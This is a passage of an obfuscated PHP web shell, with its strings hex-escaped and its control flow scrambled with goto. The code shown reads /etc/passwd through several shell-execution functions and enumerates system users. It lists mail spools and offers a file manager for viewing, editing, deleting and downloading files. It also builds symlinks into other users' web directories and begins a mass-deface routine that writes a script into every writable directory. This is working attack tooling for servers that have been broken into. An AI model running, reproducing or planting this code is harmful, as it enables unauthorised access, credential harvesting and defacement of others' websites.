9\x74\165\x72\145\40\x62\x74\156\40\x62\x74\x6e\55\144\141\156\147\145\x72\40\142\x74\x6e\x2d\163\x6d\x22\40\166\x61\x6c\x75\145\x3d\x22\120\x6f\163\151\170\x5f\x67\145\x74\x70\167\x75\151\x64\x20\106\x75\156\143\164\151\157\x6e\42\x20\156\141\x6d\145\x3d\x22\155\145\154\145\170\x22\76\12\11\x9\11\11\74\57\144\151\166\x3e\x3c\x68\162\x2f\x3e\12\11\11\x9\11\74\160\x20\143\x6c\x61\x73\163\x3d\x22\x74\x65\x78\x74\55\x63\x65\x6e\x74\145\x72\x22\x3e\x42\x79\x70\x61\x73\163\40\x55\x73\145\x72\x20\x57\x69\164\150\40\72\74\57\160\x3e\12\11\x9\11\11\74\x64\x69\166\40\x63\x6c\x61\163\x73\75\42\x64\x2d\146\x6c\x65\x78\40\x6a\165\163\164\151\146\171\x2d\x63\x6f\156\164\x65\x6e\164\x2d\143\145\156\x74\145\162\x20\x66\154\145\x78\x2d\x77\162\141\160\42\76\12\11\11\11\11\x9\x3c\x69\156\x70\165\x74\40\x74\171\x70\145\x3d\42\x73\165\x62\x6d\x69\164\x22\x20\x63\154\141\163\163\75\42\x66\151\x74\x75\x72\x65\x20\x62\x74\156\x20\x62\x74\156\55\167\141\x72\x6e\151\x6e\x67\40\x62\x74\156\x2d\163\155\x22\x20\x76\141\154\165\145\x3d\42\x41\167\153\40\x50\x72\157\x67\x72\141\155\x22\40\156\141\x6d\145\x3d\42\x61\167\x6b\x75\x73\145\x72\x22\76\12\11\x9\x9\11\x9\x3c\x69\156\x70\x75\164\40\164\x79\x70\x65\x3d\42\163\165\x62\155\151\x74\42\40\143\x6c\x61\163\163\x3d\x22\146\151\x74\x75\x72\145\40\x62\164\x6e\x20\x62\164\156\55\x77\x61\162\156\151\x6e\x67\40\x62\164\156\x2d\x73\155\x22\x20\166\141\x6c\165\x65\75\42\123\x79\163\x74\145\x6d\40\x46\x75\x6e\143\164\151\157\x6e\x22\40\156\x61\155\x65\75\x22\x73\x79\163\x74\x75\163\145\x72\42\76\12\11\11\x9\11\11\x3c\151\x6e\160\165\164\x20\x74\x79\x70\x65\x3d\x22\x73\x75\142\x6d\x69\164\42\40\x63\x6c\x61\x73\163\75\42\146\151\x74\x75\x72\145\x20\x62\x74\156\40\x62\x74\156\55\167\x61\162\156\x69\x6e\x67\40\x62\164\x6e\x2d\x73\155\x22\40\166\141\x6c\165\145\x3d\x22\120\141\163\163\x74\x68\162\x75\40\x46\x75\x6e\x63\164\x69\157\x6e\x22\x20\156\x61\x6d\145\x3d\x22\160\141\x73\163\x74\150\165\x73\x65\162\42\76\x9\xa\11\11\11\x9\x9\74\151\156\160\x75\164\x20\x74\171\x70\x65\x3d\42\163\165\142\x6d\151\164\x22\x20\x63\154\x61\163\x73\75\42\x66\151\x74\x75\162\x65\40\142\x74\x6e\x20\142\164\156\55\167\x61\x72\x6e\x69\156\147\x20\142\x74\156\x2d\163\155\x22\x20\166\141\154\x75\x65\x3d\42\105\170\145\x63\40\106\x75\x6e\x63\x74\151\157\156\x22\40\x6e\141\155\145\75\x22\145\170\165\x73\145\162\x22\x3e\x9\11\xa\x9\11\11\11\11\74\151\x6e\160\x75\x74\40\x74\171\x70\x65\75\x22\163\x75\x62\155\151\164\x22\40\x63\x6c\x61\163\x73\x3d\x22\146\x69\x74\165\x72\x65\x20\142\x74\x6e\40\142\164\156\x2d\167\x61\162\x6e\x69\x6e\147\40\x62\x74\156\55\x73\155\42\40\166\x61\154\x75\145\75\x22\x53\150\x65\x6c\154\x5f\x65\x78\x65\143\x20\x46\165\x6e\143\164\151\157\x6e\x22\x20\156\x61\x6d\x65\x3d\x22\x73\x68\x65\x78\x75\163\x65\162\x22\x3e\12\x9\x9\11\11\74\x2f\x64\151\x76\76\12\x9\x9\x9\74\57\x66\157\162\155\76"; $mail = "\x6c\163\x20\57\166\x61\x72\57\x6d\x61\x69\x6c"; $paswd = "\x2f\x65\x74\143\57\x70\141\163\163\167\x64"; if ($_POST["\163\x79\x73\x74"]) { echo "\x3c\164\x65\x78\164\x61\x72\x65\x61\40\x63\x6c\x61\x73\163\75\47\146\x6f\x72\x6d\x2d\143\157\156\x74\x72\157\x6c\x27\x20\x72\x6f\x77\163\75\47\x31\63\47\76"; echo system("\x63\x61\164\40{$paswd}"); echo "\x3c\x2f\164\x65\170\164\x61\x72\x65\141\76\74\142\x72\x2f\x3e"; } if ($_POST["\160\141\163\x73\x74\x68"]) { echo "\74\164\145\170\x74\x61\162\x65\141\40\x63\x6c\x61\163\x73\75\x27\146\x6f\162\x6d\x2d\x63\x6f\x6e\164\x72\x6f\154\x27\x20\x72\x6f\167\163\75\x27\x31\63\x27\x3e"; echo passthru("\143\141\x74\x20{$paswd}"); echo "\74\x2f\164\x65\x78\x74\x61\162\x65\141\76\74\142\162\x2f\76"; } if ($_POST["\145\170"]) { echo "\x3c\x74\145\x78\x74\141\162\x65\x61\40\143\x6c\141\x73\163\x3d\47\146\157\x72\155\55\143\157\x6e\164\x72\157\x6c\x27\x20\162\x6f\x77\x73\75\x27\61\63\47\76"; echo exec("\x63\141\164\40{$paswd}\x3b"); echo "\74\57\164\145\170\164\141\x72\145\x61\76\74\142\162\57\76"; } if ($_POST["\x73\x68\x65\x78"]) { echo "\74\x74\x65\x78\164\141\162\x65\x61\x20\x63\x6c\141\163\163\x3d\x27\x66\x6f\x72\x6d\55\143\x6f\156\164\x72\x6f\x6c\x27\x20\162\157\167\x73\x3d\47\x31\x33\47\76"; echo shell_exec("\143\141\164\40{$paswd}"); echo "\74\x2f\x74\x65\x78\x74\141\162\145\x61\x3e\74\x62\x72\57\x3e"; } if ($_POST["\155\145\x6c\145\x78"]) { echo "\74\164\x65\x78\x74\141\x72\145\x61\40\x63\154\x61\x73\163\75\x27\x66\x6f\162\155\x2d\143\x6f\156\x74\162\x6f\154\x27\40\162\x6f\x77\163\75\47\61\63\47\x3e"; for ($uid = 0; $uid < 60000; $uid++) { $ara = posix_getpwuid($uid); if (!empty($ara)) { while (list($key, $val) = each($ara)) { print "{$val}\72"; } print "\x6e"; } } echo "\x3c\x2f\x74\x65\170\x74\x61\x72\x65\141\x3e\x3c\x62\162\57\x3e"; } if ($_POST["\x61\167\x6b\x75\x73\x65\162"]) { echo "\74\x74\145\170\164\x61\162\x65\x61\40\143\x6c\141\163\x73\75\47\x66\x6f\162\x6d\55\x63\157\156\164\x72\157\x6c\x27\x20\x72\157\x77\163\75\x27\x31\x33\47\76\12\11\11\11\11" . shell_exec("\141\167\x6b\40\55\x46\x3a\40\47\x7b\40\160\x72\x69\156\164\x20\x24\61\40\175\47\x20{$paswd}\x20\174\40\163\157\x72\x74") . "\xa\11\11\x9\11\x3c\x2f\x74\x65\x78\x74\x61\x72\145\x61\76\x3c\x62\162\57\76"; } if ($_POST["\x73\171\x73\164\x75\163\x65\x72"]) { echo "\74\x74\145\x78\x74\141\162\x65\x61\x20\x63\154\141\x73\x73\75\x27\146\157\x72\x6d\55\x63\157\156\x74\x72\x6f\154\x27\40\162\x6f\x77\163\75\47\x31\x33\x27\x3e"; echo system("{$mail}"); echo "\74\x2f\x74\x65\x78\164\141\x72\x65\x61\x3e\x3c\142\162\x3e"; } if ($_POST["\160\x61\x73\x73\x74\150\x75\163\x65\162"]) { echo "\74\164\x65\170\164\141\x72\x65\141\x20\x63\154\x61\163\x73\75\x27\x66\x6f\x72\x6d\x2d\143\x6f\156\164\162\x6f\x6c\x27\x20\x72\x6f\167\163\x3d\x27\61\x33\47\76"; echo passthru("{$mail}"); echo "\x3c\x2f\164\145\170\164\x61\162\x65\141\76\x3c\142\x72\x3e"; } if ($_POST["\145\x78\x75\x73\x65\162"]) { echo "\74\x74\x65\x78\x74\141\x72\145\x61\x20\143\154\x61\x73\163\x3d\47\x66\x6f\162\x6d\55\143\x6f\x6e\x74\162\157\154\x27\x20\x72\x6f\x77\x73\x3d\x27\x31\x33\47\76"; echo exec($mail); echo "\x3c\x2f\x74\x65\x78\164\x61\x72\145\141\76\74\142\162\76"; } if ($_POST["\163\150\145\170\165\163\x65\162"]) { echo "\x3c\x74\145\x78\x74\141\x72\x65\141\40\x63\x6c\141\163\x73\75\47\x66\157\162\x6d\55\x63\157\x6e\x74\x72\157\x6c\47\40\x72\157\167\163\x3d\x27\61\63\47\76"; echo shell_exec("{$mail}"); echo "\x3c\57\164\145\170\164\x61\x72\145\141\x3e\74\142\x72\x3e"; } echo "\74\x2f\144\x69\x76\x3e"; die; } goto V40Ns; oqZvC: if (isset($_GET["\x64\x69\162"])) { $dir = $_GET["\144\x69\162"]; chdir($dir); } else { $dir = getcwd(); } goto k1N0A; n0tKq: foreach ($scandir as $file) { if (!is_file($path . "\57" . $file)) { continue; } $size = filesize($path . "\57" . $file) / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . "\40\x4d\x42"; } else { $size = $size . "\x20\113\x42"; } echo "\x3c\164\162\76\12\11\11\x9\11\11\x9\74\164\144\76\74\151\x6d\147\x20\163\162\143\75\42"; $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); if ($ext == "\160\x68\160") { echo "\x68\164\x74\x70\x73\72\x2f\57\151\x6d\141\147\x65\x2e\x66\154\x61\x74\x69\143\157\156\x2e\143\x6f\x6d\x2f\x69\x63\x6f\x6e\x73\57\x70\x6e\x67\57\61\62\70\x2f\63\x33\x37\57\63\x33\67\x39\64\x37\56\160\156\147\x22"; } elseif ($ext == "\x68\164\x6d\154") { echo "\x68\164\164\160\163\x3a\x2f\57\x69\155\x61\x67\x65\x2e\146\154\x61\164\151\143\157\x6e\x2e\x63\157\155\x2f\151\x63\x6f\x6e\x73\57\x70\x6e\x67\57\x31\x32\x38\57\61\63\66\57\x31\x33\66\65\62\x38\56\x70\x6e\x67\42"; } elseif ($ext == "\143\163\x73") { echo "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\155\141\147\145\56\x66\154\141\x74\x69\143\157\x6e\56\143\157\155\57\151\x63\x6f\156\163\57\x70\156\x67\x2f\61\x32\70\57\61\63\x36\57\x31\x33\66\x35\62\x37\56\x70\x6e\x67\42"; } elseif ($ext == "\160\156\147") { echo "\x68\x74\x74\160\163\x3a\x2f\x2f\x69\x6d\141\x67\x65\56\x66\x6c\141\164\151\143\x6f\156\x2e\x63\x6f\155\x2f\x69\143\x6f\156\x73\x2f\160\156\x67\x2f\61\x32\70\57\x31\63\66\x2f\61\63\x36\65\x32\x33\56\160\x6e\147\x22"; } elseif ($ext == "\x6a\x70\x67") { echo "\x68\x74\x74\x70\163\72\57\57\x69\155\x61\147\x65\x2e\x66\x6c\x61\164\151\143\157\156\x2e\x63\157\x6d\x2f\151\143\157\156\x73\57\160\156\147\x2f\61\62\x38\57\x31\63\x36\x2f\x31\x33\x36\x35\62\x34\x2e\x70\x6e\147\42"; } elseif ($ext == "\152\x70\145\147") { echo "\x68\x74\164\x70\72\x2f\57\x69\x2e\151\x6d\x67\x75\162\x2e\x63\x6f\x6d\57\x65\70\x6d\x6b\x76\120\x66\x2e\160\x6e\147\42"; } elseif ($ext == "\x7a\x69\160") { echo "\x68\x74\x74\160\x73\x3a\57\57\x69\155\x61\x67\145\x2e\146\154\141\x74\x69\143\x6f\156\x2e\143\x6f\x6d\57\151\143\157\x6e\163\57\160\x6e\147\x2f\x31\x32\70\x2f\61\63\66\57\61\63\x36\x35\x34\64\x2e\160\156\x67\x22"; } elseif ($ext == "\152\x73") { echo "\x68\164\164\x70\x73\x3a\57\57\x69\155\x61\x67\x65\x2e\146\154\141\164\151\143\x6f\x6e\x2e\x63\x6f\155\57\x69\x63\157\x6e\163\x2f\x70\156\147\x2f\x31\x32\70\x2f\x31\61\62\x36\57\61\61\62\66\70\x35\66\56\x70\156\x67"; } elseif ($ext == "\164\164\146") { echo "\150\164\164\x70\163\72\57\57\151\x6d\x61\x67\x65\56\x66\154\141\164\151\143\x6f\x6e\56\x63\x6f\155\57\x69\143\157\x6e\163\x2f\160\x6e\x67\x2f\61\x32\70\57\61\61\62\66\x2f\61\61\62\x36\x38\x39\62\56\x70\x6e\147"; } elseif ($ext == "\157\x74\146") { echo "\150\164\164\160\163\x3a\x2f\x2f\x69\155\141\147\x65\x2e\146\x6c\141\164\151\143\x6f\x6e\x2e\143\157\155\x2f\x69\x63\157\x6e\163\57\x70\156\147\57\x31\62\x38\x2f\61\61\x32\x36\57\61\61\x32\x36\70\x39\x31\56\160\156\x67"; } elseif ($ext == "\164\170\164") { echo "\150\164\164\160\x73\72\57\57\x69\155\141\147\x65\56\x66\x6c\x61\164\151\143\x6f\x6e\x2e\143\157\x6d\x2f\x69\x63\157\x6e\163\x2f\x70\156\147\57\61\x32\x38\x2f\x31\63\x36\57\x31\63\x36\65\63\x38\56\160\x6e\x67"; } elseif ($ext == "\151\x63\x6f") { echo "\150\164\x74\x70\163\x3a\x2f\x2f\151\155\x61\x67\145\56\x66\x6c\141\164\151\143\157\x6e\56\143\x6f\155\x2f\x69\x63\x6f\x6e\x73\x2f\x70\156\x67\57\x31\x32\x38\57\61\61\x32\x36\x2f\61\x31\62\x36\x38\x37\63\x2e\160\x6e\x67"; } elseif ($ext == "\143\157\156\146") { echo "\x68\x74\164\160\x73\x3a\x2f\x2f\151\155\141\x67\x65\56\146\x6c\x61\x74\x69\x63\x6f\156\x2e\x63\157\x6d\57\151\143\157\x6e\163\57\x70\156\x67\57\65\x31\62\57\61\65\67\x33\x2f\61\65\x37\63\63\60\61\56\x70\x6e\x67"; } elseif ($ext == "\x68\x74\141\x63\143\x65\x73\x73") { echo "\x68\x74\164\x70\x73\x3a\x2f\57\x69\155\x61\147\145\x2e\146\154\x61\164\151\x63\157\156\x2e\x63\157\x6d\x2f\x69\x63\157\156\x73\x2f\x70\x6e\147\x2f\61\x32\70\x2f\x31\67\x32\x30\x2f\61\x37\62\60\x34\64\64\x2e\x70\156\147"; } elseif ($ext == "\163\x68") { echo "\x68\x74\x74\x70\163\72\x2f\57\151\x6d\x61\147\145\56\146\x6c\141\164\x69\143\157\156\56\143\157\155\57\x69\143\x6f\x6e\163\x2f\x70\156\x67\57\61\62\x38\x2f\x36\61\x37\x2f\66\x31\67\x35\63\x35\x2e\x70\156\147"; } elseif ($ext == "\160\171") { echo "\150\x74\164\160\x73\72\x2f\x2f\151\x6d\141\x67\x65\56\x66\154\141\164\x69\x63\157\x6e\56\143\x6f\155\x2f\x69\143\x6f\156\163\57\160\x6e\x67\57\61\x32\70\x2f\61\70\x30\57\61\70\60\x38\66\67\x2e\160\156\x67"; } elseif ($ext == "\x69\x6e\144\x73\143") { echo "\x68\x74\164\x70\163\x3a\x2f\x2f\151\x6d\x61\147\x65\x2e\x66\154\x61\x74\151\x63\x6f\x6e\56\143\157\x6d\57\x69\x63\x6f\156\163\57\160\156\147\57\65\61\x32\x2f\x31\x32\66\x35\x2f\x31\62\x36\x35\x35\x31\x31\x2e\x70\x6e\147"; } elseif ($ext == "\x73\161\x6c") { echo "\x68\164\x74\160\x73\x3a\x2f\57\x69\x6d\147\56\151\x63\x6f\156\x73\x38\56\143\x6f\155\57\165\x6c\x74\162\141\166\151\157\x6c\x65\x74\x2f\62\x78\57\x64\141\164\141\x2d\143\x6f\156\146\x69\x67\x75\162\141\x74\x69\157\x6e\x2e\160\156\147"; } elseif ($ext == "\x70\154") { echo "\150\164\x74\x70\72\57\57\x69\56\151\x6d\x67\x75\x72\x2e\x63\157\155\x2f\x50\x6e\x6d\x58\70\110\x39\56\160\156\x67"; } elseif ($ext == "\x70\144\x66") { echo "\150\164\164\x70\x73\x3a\x2f\x2f\151\x6d\141\147\x65\56\x66\154\x61\x74\151\x63\x6f\x6e\56\143\x6f\155\x2f\151\143\157\156\x73\57\x70\156\147\57\61\x32\x38\x2f\61\63\66\x2f\x31\63\66\65\62\x32\56\x70\x6e\147"; } elseif ($ext == "\x6d\x70\x34") { echo "\150\164\x74\160\163\x3a\x2f\57\151\x6d\x61\147\x65\x2e\146\x6c\x61\164\151\x63\157\156\x2e\143\157\155\x2f\151\x63\x6f\x6e\163\x2f\x70\x6e\x67\57\x31\62\x38\x2f\61\x33\x36\57\x31\63\x36\x35\64\65\56\160\156\147"; } elseif ($ext == "\155\x70\63") { echo "\x68\164\x74\160\163\x3a\x2f\x2f\x69\x6d\x61\x67\145\x2e\x66\154\x61\x74\x69\143\157\x6e\56\x63\157\x6d\x2f\x69\143\x6f\156\163\x2f\160\x6e\x67\57\61\x32\70\57\x31\x33\66\x2f\61\63\x36\x35\x34\x38\56\160\x6e\147"; } elseif ($ext == "\147\x69\x74") { echo "\x68\x74\164\x70\163\x3a\57\57\151\155\141\x67\x65\x2e\x66\154\x61\164\x69\143\x6f\x6e\x2e\143\x6f\x6d\x2f\151\143\157\x6e\163\x2f\x70\156\x67\x2f\61\x32\70\57\x36\61\x37\x2f\66\x31\67\x35\x30\x39\x2e\x70\156\147"; } elseif ($ext == "\x6d\x64") { echo "\x68\164\164\x70\163\72\x2f\x2f\x69\x6d\141\147\x65\x2e\146\154\141\x74\x69\x63\157\x6e\56\x63\x6f\x6d\57\151\x63\157\x6e\x73\x2f\x70\x6e\147\57\x31\62\70\x2f\66\x31\67\x2f\x36\x31\67\x35\62\60\x2e\x70\x6e\147"; } else { echo "\x68\164\x74\160\x3a\57\x2f\x69\x63\x6f\x6e\x73\x2e\x69\143\x6f\156\x61\x72\x63\150\x69\166\145\56\143\157\x6d\57\151\143\x6f\x6e\x73\x2f\172\150\157\x6f\154\145\x67\157\x2f\x6d\x61\x74\145\x72\x69\x61\x6c\x2f\x32\65\66\57\x46\151\154\x65\164\x79\160\145\x2d\x44\157\x63\163\55\x69\143\x6f\156\x2e\x70\x6e\147"; } echo "\x22\x20\143\x6c\141\163\163\75\x22\x69\143\157\62\x22\x3e\x3c\x2f\151\x6d\x67\76"; if (strlen($file) > 25) { $_file = substr($file, 0, 25) . "\x2e\56\x2e\55\x2e" . $ext; } else { $_file = $file; } echo "\40\74\x61\x20\150\162\145\x66\x3d\42\x3f\144\151\162\x3d" . $path . "\46\141\153\x73\x69\x3d\x76\x69\x65\167\x26\146\151\154\145\x3d" . $path . "\x2f" . $file . "\x22\x3e" . $_file . "\x3c\x2f\x61\x3e\x3c\57\164\x64\x3e\xa\x9\11\x9\x9\x9\74\164\x64\40\143\154\141\x73\x73\75\x22\x74\145\170\x74\x2d\143\x65\156\164\145\x72\40\x64\55\x66\x6c\x65\170\42\76" . $size . "\74\x2f\x74\x64\76\12\11\x9\11\11\11\74\x74\x64\x3e\x3c\x61\x20\150\x72\x65\146\75\x22\x3f\144\x69\x72\x3d" . $path . "\46\141\x6b\x73\x69\75\143\150\155\x6f\x64\x26\146\151\x6c\145\x3d" . $path . "\x2f" . $file . "\x22\x20\x63\154\x61\163\163\x3d\42\164\145\170\164\55\x63\145\x6e\x74\145\162\x22\76"; if (is_writable($path . "\57" . $file)) { echo "\74\x66\x6f\x6e\x74\40\143\157\x6c\157\162\x3d\42\x23\x30\60\146\x66\60\x30\42\76"; } elseif (!is_readable($path . "\57" . $file)) { echo "\x3c\146\157\156\164\x20\143\x6f\x6c\157\x72\x3d\x22\162\x65\x64\42\x3e"; } echo perms($path . "\57" . $file); if (is_writable($path . "\x2f" . $file) || !is_readable($path . "\x2f" . $file)) { echo "\x3c\57\146\157\x6e\164\x3e\x3c\57\141\76\x3c\57\164\144\76\xa\x9\11\11\x9\x9\x3c\x74\144\x20\x63\154\141\x73\163\x3d\x22\x74\145\x78\x74\55\143\x65\x6e\164\145\162\x20\144\x2d\146\154\145\x78\x22\x3e\xa\11\x9\11\x9\x9\x9\x3c\x61\40\164\x69\164\x6c\145\x3d\42\114\151\150\141\x74\42\x20\143\154\141\x73\x73\x3d\42\142\141\x64\147\x65\40\x62\141\144\x67\x65\55\151\x6e\146\x6f\x22\x20\150\x72\145\146\75\42\x3f\x64\x69\x72\x3d" . $path . "\x26\x61\x6b\x73\151\x3d\166\x69\145\x77\x26\x66\x69\x6c\145\x3d" . $path . "\x2f" . $file . "\42\x3e\x26\x6e\142\x73\x70\x3b\x3c\151\x20\x63\154\141\x73\x73\75\42\x66\x61\40\x66\x61\55\145\x79\145\x22\76\x3c\x2f\x69\76\46\156\x62\163\160\x3b\74\57\141\76\46\x6e\142\163\x70\x3b\46\156\142\163\160\73\xa\11\x9\x9\x9\x9\x9\x3c\141\40\164\151\164\x6c\x65\x3d\x22\x45\x64\151\164\42\40\x63\x6c\141\x73\163\75\42\142\x61\x64\147\x65\x20\142\141\144\x67\x65\x2d\163\x75\143\143\145\x73\163\42\x20\x68\162\x65\x66\75\x22\x3f\x64\x69\x72\x3d" . $path . "\x26\x61\x6b\x73\x69\x3d\x65\144\x69\x74\46\146\151\x6c\x65\75" . $path . "\x2f" . $file . "\42\x3e\46\x6e\x62\x73\160\x3b\x3c\151\40\143\x6c\x61\163\163\75\42\x66\141\162\x20\146\x61\x2d\x65\x64\x69\x74\42\76\74\x2f\x69\76\46\x6e\142\163\160\x3b\x3c\x2f\x61\x3e\46\156\x62\163\160\73\46\x6e\x62\163\x70\73\xa\x9\x9\11\11\11\11\x3c\x61\x20\x74\x69\164\x6c\x65\75\x22\122\145\x6e\x61\155\145\x22\x20\x63\x6c\141\163\x73\x3d\x22\142\x61\144\x67\x65\40\x62\x61\x64\x67\145\55\163\165\143\x63\145\163\x73\42\40\150\162\x65\146\75\x22\77\x64\x69\162\x3d" . $path . "\46\141\x6b\x73\151\x3d\x72\145\156\141\155\x65\46\146\x69\x6c\x65\75" . $path . "\x2f" . $file . "\x22\x3e\46\x6e\142\x73\x70\x3b\74\151\40\143\x6c\x61\x73\163\75\x22\x66\141\40\146\x61\x2d\160\x65\156\x63\151\154\x22\76\x3c\57\151\x3e\46\156\142\163\160\x3b\74\x2f\x61\76\46\156\x62\x73\x70\73\x26\156\x62\163\x70\x3b\12\x9\x9\11\11\x9\11\74\141\x20\x63\154\x61\x73\x73\75\42\x62\141\144\x67\145\x20\x62\x61\x64\x67\145\55\x64\141\156\147\145\162\42\x20\150\162\x65\x66\75\x22\x3f\x64\151\162\75" . $path . "\46\141\153\x73\151\x3d\x68\x61\160\165\x73\146\x26\x66\151\154\x65\75" . $path . "\x2f" . $file . "\42\x20\x74\x69\164\154\x65\75\42\x44\145\154\x65\x74\145\42\76\46\x6e\142\x73\160\x3b\x3c\151\x20\x63\x6c\x61\163\x73\75\x22\146\x61\x20\x66\141\55\x74\162\x61\163\150\42\76\74\57\x69\76\46\x6e\142\163\160\73\74\x2f\x61\76\46\156\142\163\160\73\46\156\x62\x73\x70\x3b\12\11\11\11\x9\11\11\74\x61\40\143\x6c\x61\x73\x73\75\42\142\x61\144\x67\145\40\x62\141\144\147\x65\x2d\x70\x72\151\x6d\x61\162\x79\42\x20\150\162\145\146\75\42\x3f\46\144\x69\162\x3d" . $path . "\x26\x61\x6b\163\151\x3d\144\157\167\x6e\154\x6f\x61\x64\x26\x66\151\x6c\145\x3d" . $path . "\x2f" . $file . "\x22\x20\164\151\164\154\x65\75\x22\104\157\167\x6e\x6c\157\141\x64\x22\76\46\156\142\x73\160\x3b\x3c\151\40\x63\154\141\x73\x73\75\42\146\x61\x20\x66\141\55\x64\157\x77\156\x6c\x6f\x61\x64\x22\x3e\74\x2f\151\x3e\46\x6e\x62\x73\160\73\x3c\57\x61\x3e\12\x9\11\x9\11\x9\x3c\57\164\x64\76\12\x9\x9\x9\11\74\57\164\x72\76"; } } goto y7fjP; PoD22: if ($_GET["\141\x6b\163\151"] == "\163\171\x6d\x5f\x62\171\160\141\163") { if (isset($_GET["\163\x61\166\x65"]) and isset($_POST["\146\x69\x6c\145"]) or @filesize("\160\141\163\163\x77\x64\x2e\x74\x78\x74") > 0) { $cont = stripcslashes($_POST["\146\x69\x6c\x65"]); if (!file_exists("\160\x61\x73\x73\167\x64\56\x74\170\x74")) { $f = @fopen("\x70\x61\x73\163\x77\x64\x2e\x74\x78\x74", "\167"); $w = @fwrite($f, $cont); fclose($f); } if ($w or @filesize("\160\141\163\x73\x77\144\x2e\164\x78\164") > 0) { echo "\74\x64\151\x76\40\143\154\x61\163\163\x3d\x27\x74\155\x70\47\x3e\12\11\11\x9\11\x9\x3c\164\141\142\154\x65\x20\143\154\x61\163\x73\x3d\x27\x74\x65\170\164\x2d\143\145\156\x74\x65\x72\40\164\141\x62\x6c\x65\x2d\162\x65\x73\x70\x6f\156\163\151\x76\x65\47\76\12\x9\x9\11\x9\x9\x9\74\x74\150\x65\141\144\x20\x63\154\x61\x73\163\75\x27\x62\x67\55\151\x6e\x66\x6f\47\x3e\12\x9\11\11\x9\x9\11\11\74\x74\150\76\125\x73\x65\x72\163\x3c\57\164\x68\x3e\12\x9\11\x9\11\11\x9\x9\x3c\164\x68\76\x73\171\155\154\151\x6e\x6b\x3c\x2f\164\150\x3e\12\x9\11\x9\11\x9\11\11\74\164\150\76\106\124\120\74\57\x74\x68\x3e\xa\11\x9\11\11\11\11\x3c\57\164\x68\145\x61\144\x3e"; flush(); $fil3 = file("\160\x61\163\163\x77\x64\56\164\x78\164"); foreach ($fil3 as $f) { $u = explode("\x3a", $f); $user = $u["\60"]; echo "\x3c\x74\x72\x3e\12\x9\11\11\x9\11\x9\x9\11\x3c\x74\x64\40\143\154\141\x73\x73\x3d\x27\x74\145\170\164\55\154\x65\x66\x74\x20\160\x6c\x2d\x31\x27\76{$user}\74\x2f\x74\144\76\xa\11\11\11\x9\x9\x9\11\x9\x3c\x74\144\76\12\x9\x9\x9\x9\11\x9\x9\11\x9\x3c\141\40\150\162\145\146\x3d\47\163\x79\155\x2f\162\157\x6f\x74\57\150\x6f\x6d\x65\57{$user}\x2f\x70\165\142\154\151\x63\137\x68\x74\155\154\x27\40\164\141\x72\147\145\x74\75\47\x5f\142\x6c\x61\156\153\47\76\123\x79\x6d\x6c\151\x6e\153\x20\74\x2f\x61\x3e\xa\11\11\11\x9\11\11\11\11\x3c\x2f\x74\x64\x3e\xa\x9\11\x9\x9\x9\x9\x9\11\x3c\164\144\76\xa\11\11\x9\x9\x9\x9\x9\11\x9\74\x61\40\150\x72\x65\146\75\47{$pageFTP}\x2f\x73\x79\x6d\57\162\x6f\157\164\x2f\150\157\x6d\145\57{$user}\x2f\x70\165\142\x6c\x69\x63\137\x68\x74\155\x6c\x27\x20\164\141\x72\147\145\x74\75\47\137\142\154\x61\156\153\47\76\106\124\120\x3c\x2f\x61\x3e\12\11\11\x9\11\11\x9\11\x9\74\57\164\x64\76\xa\11\x9\11\11\11\11\x9\x3c\x2f\164\x72\x3e"; flush(); flush(); } die("\x3c\x2f\164\162\76\x3c\x2f\x74\x61\x62\154\x65\76\x3c\x2f\x64\151\166\x3e"); } } echo "\x72\x65\141\x64\x20\x2f\x65\x74\143\57\160\x61\x73\x73\x77\144\12\x9\x9\x3c\146\157\162\155\x20\x6d\145\164\150\x6f\144\x3d\47\x70\157\x73\164\47\x20\141\x63\164\151\x6f\x6e\x3d\47\77\144\x69\x72\75{$dir}\x26\141\153\x73\x69\x3d\163\x79\155\x5f\x62\x79\x70\141\163\46\163\x61\x76\145\x3d\61\x27\x3e\12\11\x9\x9\x3c\x74\145\170\x74\x61\x72\x65\x61\x20\x63\x6c\x61\163\163\x3d\x27\146\x6f\x72\155\55\143\x6f\156\164\x72\x6f\x6c\47\40\162\x6f\167\x73\75\47\70\x27\40\x6e\x61\155\145\75\47\146\151\154\145\47\76"; flush(); $file = "\x2f\x65\x74\143\x2f\160\141\x73\163\x77\x64"; $r3ad = @fopen($file, "\x72"); if ($r3ad) { $content = @fread($r3ad, @filesize($file)); echo '' . htmlentities($content) . ''; } elseif (!$r3ad) { $r3ad = @show_source($file); } elseif (!$r3ad) { $r3ad = @highlight_file($file); } elseif (!$r3ad) { for ($uid = 0; $uid < 1000; $uid++) { $ara = posix_getpwuid($uid); if (!empty($ara)) { while (list($key, $val) = each($ara)) { print "{$val}\x3a"; } print "\12"; } } } flush(); echo "\74\57\164\x65\170\x74\141\x72\145\x61\x3e\x3c\142\162\x2f\76\xa\11\11\11\74\151\156\x70\x75\x74\40\164\x79\160\145\75\47\163\165\142\155\x69\164\47\x20\x63\x6c\141\163\163\x3d\x27\x62\x74\x6e\x20\142\x74\x6e\x2d\x64\x61\x6e\x67\x65\162\40\x62\164\156\x2d\142\154\x6f\143\x6b\47\x20\166\141\154\165\x65\x3d\47\x53\171\x6d\x6c\x69\x6e\153\x27\x2f\x3e\xa\x9\x9\x3c\x2f\146\157\162\155\x3e"; flush(); die; } goto kOh3B; Ednnu: if ($_GET["\141\x6b\x73\151"] == "\155\141\x73\x64\x65\146") { function tipe_massal($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}\57{$dirb}"; $lokasi = $dirc . "\57" . $namafile; if ($dirb === "\56") { file_put_contents($lokasi, $isi_script); } elseif ($dirb === "\56\56") { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "\104\157\x6e\x65\x20\x3e\x20{$lokasi}\xa"; file_put_contents($lokasi, $isi_script); $masdef = tipe_massal($dirc, $namafile, $isi_script); } } } } } } function tipe_biasa($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}\x2f{$dirb}"; $lokasi = $dirc . "\57" . $namafile; if ($dirb === "\x2e") { file_put_contents($lokasi, $isi_script); } elseif ($dirb === "\56\56") { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "\x44\157\156\145\x20\76\x20{$dirb}\x2f{$namafile}\xa"; 